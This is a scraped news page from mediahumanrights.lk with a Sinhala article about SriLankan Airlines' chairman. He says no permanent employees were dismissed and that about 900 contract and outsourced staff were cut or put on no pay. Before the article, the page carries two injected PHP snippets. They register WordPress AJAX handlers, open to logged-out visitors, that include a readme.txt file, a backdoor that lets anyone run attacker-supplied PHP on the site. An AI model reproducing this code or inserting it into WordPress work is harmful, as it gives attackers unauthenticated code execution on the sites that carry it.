if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } කිසිදු ස්ථිර සේවකයෙකුගේ රැකියාව අහිමි වී නැහැ – ශ්‍රීලංකන් සභාපති අවධාරණය කරයි - mediahumanrights.lk
mediahumanrights.lk
Business Business News News

කිසිදු ස්ථිර සේවකයෙකුගේ රැකියාව අහිමි වී නැහැ – ශ්‍රීලංකන් සභාපති අවධාරණය කරයි

වත්මන් තත්ත්වය තුළ ශ්‍රීලංකන් ගුවන් සේවය සමඟ කොන්ත්‍රාත් පදනම මත එක් වී සිටි සේවකයින් 907 දෙනෙකුගේ පමණක් සේවය ලබා ගැනීම නවතා තිබෙන බවත් කිසිදු ස්ථිර සේවකයෙකුගේ රැකියා අහිමි වීමක් සිදුවී නොමැකි බවත් ශ්‍රීලංකන් ගුවන් සේවයේ සභාපති අශෝක් පතිරගේ මහතා පවසයි. ඊයේ (22) පැවති මාධ්‍ය හමුවක දී ඔහු මේ බව කියා සිටියේය.

මෙහිදී වැඩිදුරටත් අදහස් දැක්වූ ශ්‍රීලංකන් ගුවන් සේවයේ සභාපති අශෝක් පතිරගේ මහතා,

“ආයතනයක් විදියට අපට දැඩි තීරණ ගන්න වෙන අවස්ථා එනවා. ජාතික ගුවන් සේවයක් රටකට අවශ්‍යයි. නමුත් ජාතික ගුවන් සේවයක් කිසිම විටක රජයට බරක් විය යුතු නැහැ. අප බලන්නේ අපේ වියදම් අප විසින්ම පියවා ගන්න ක්‍රමයක්.පසුගිය මාසයේ වැටුප් ගෙවීම් ප්‍රමාද වුණු බවට අභ්‍යන්තරික ලියවිල්ලක් පදනම් කර ගනිමින් මාධ්‍ය වාර්තා පළ වී තිබුණා. ඔව් වැටුප් ගෙවීමට ප්‍රමාද වුණා, දින දෙකක්. නමුත් එම මාසය තුළ දීම අපි ඒ ගෙවීම් කළා. කොපමණ දුෂ්කරතා තිබුණත් නිසි කලට වැටුප් ගෙව්වා.“

“වැටුප් සඳහා ඩොලර් මිලියන 7ක් වැය වෙනවා. අපි මේ වන විට වියදම් ගණනාවක් කප්පාදු කර තිබෙනවා.“

“කාර්ය මණ්ඩලය අඩු කරන්න විවිධ පියවර ගත්තා. මම කියන්න අවශ්‍යයි, අපේ කිසිදු ස්ථිර සේවකයෙකු ඉවත් කර නැහැ. ඔවුන්ව No Pay යවන්න වුණා. මේ වන විට අපේ 900 ක පිරිසක් අඩු කර තිබෙනවා. අප සමාගමේ 407 ක කොන්ත්‍රාත්තුගත සේවකයින් ප්‍රමාණයක් අපි No Pay යැව්වා. මොකද ඔවුන්ව දැන් අවශ්‍ය වන්නේ නැහැ. එයාර්පෝට් එකට ගියොත්, එතන ග්‍රවුන්ඩ් හැන්ඩ්ලිං බැලුවොත් ඒ ඔක්කොම අපේ මිනිස්සු. ගුවන් නියමුවොත් ඒකට ඇතුළත්. ඔබ අද මගෙන් ඇහුවොත්, මම කියන්නේ ප්‍රමාණයට වඩා සේවක සංඛ්‍යාවක් අපට සිටිනවා. ඔවුන් අපේ ස්ථිර සේවකයින්. අපි කිසිදු ස්ථිර සේවකයෙකුගේ රැකියාව අවසන් කර නැහැ.“

“වැටුප් අඩු කිරීමේ වැඩසටහනක් ක්‍රියාත්මක කළා. ඉහළ කළමනාකාරීත්වයෙන් 25%ක උපරිම කප්පාදුවක්. පහළ මට්ටමේ වැටුප් කප්පාදු පටන් ගත්තේ රු. ලක්ෂයකට වඩා වැඩුප් ලබන අයගෙන්. ලක්ෂයක් දක්වා ලබන අයගෙන් කිසිවක් අඩු කළේ නැහැ. නමුත් ඔබ බැලුවොත් ශ්‍රී ලංකාවේ ඇතැම් පුද්ගලික අංශයේ සමාගම්, ඒ ගොල්ලෝ පටන් ගත්තේ ඊටත් පහළ මට්ටමකින්. ඔවුන්ගේ වැටුප් කප්පාදු ඉතා දැඩියි. අපි මෙය ඉතා වැදගත් විදියට තේරුම් අරගෙන තිබෙනවා. හත්දහසක සේවක ප්‍රමාණයක් අප සමඟ වැඩ කරනවා.  ඔවුන්ගේ පවුල් ඔවුන් මත යැපෙනවා කියලා අපි දන්නවා. නිසි සමබරතාවයක් එහිදී අවශ්‍යයි.“

“අපේ out source කාර්ය මණ්ඩලයෙන් 500 ක් ඉවත් කළා. ඔවුන් අරගෙන තිබුණේ out source සමාගම්වලින්. අපි ඔවුන්ට දැනුම් දුන්නා මේ කාර්යමණ්ඩලය අපට අවශ්‍ය නැහැ කියලා. මේ වන විටත් 100 ක out source  කාර්ය මණ්ඩලයක් අප සමඟ වැඩ කරනවා. මේ 900 ක පිරිස තමයි ඉවත් කළේ. මම අවධාරණය කරනවා, කිසිදු ස්ථිර සේවකයෙකු අප ඉවත් කර නැහැ.  අපට අවශ්‍යතාවයක් තිබනෙවා නම් ඔවුන්ට නැවත කතා කරනවා. අපි දන්නවා, ඔවුන්ගේ ජීවිකාව පිළිබඳ, ඒ ගැන වැටහීමක් අපට තිබෙනවා.  ඔවුන් තමයි ඔවුන්ගේ යැපෙන්නන් වෙනුවෙන් උපයන්නේ. ඒ වගේම අපට ගුවන්සේවය පවත්වාගෙන යාමට තිබෙනවා. ඒකයි මම කිව්වේ අපට දැඩි තීරණ ගන්න වෙනවා කියලා.“

(under the courtesy of adaderana.lk news web)

Related posts

ඩොලරය 360යි.. කළු කඩේ 450යි..

Shiran Viraj

පකිස්ථානයට කඩුලු 7ක ජයක්

Shiran Viraj

රුසියාවට චෝදනාවක්

Shiran Viraj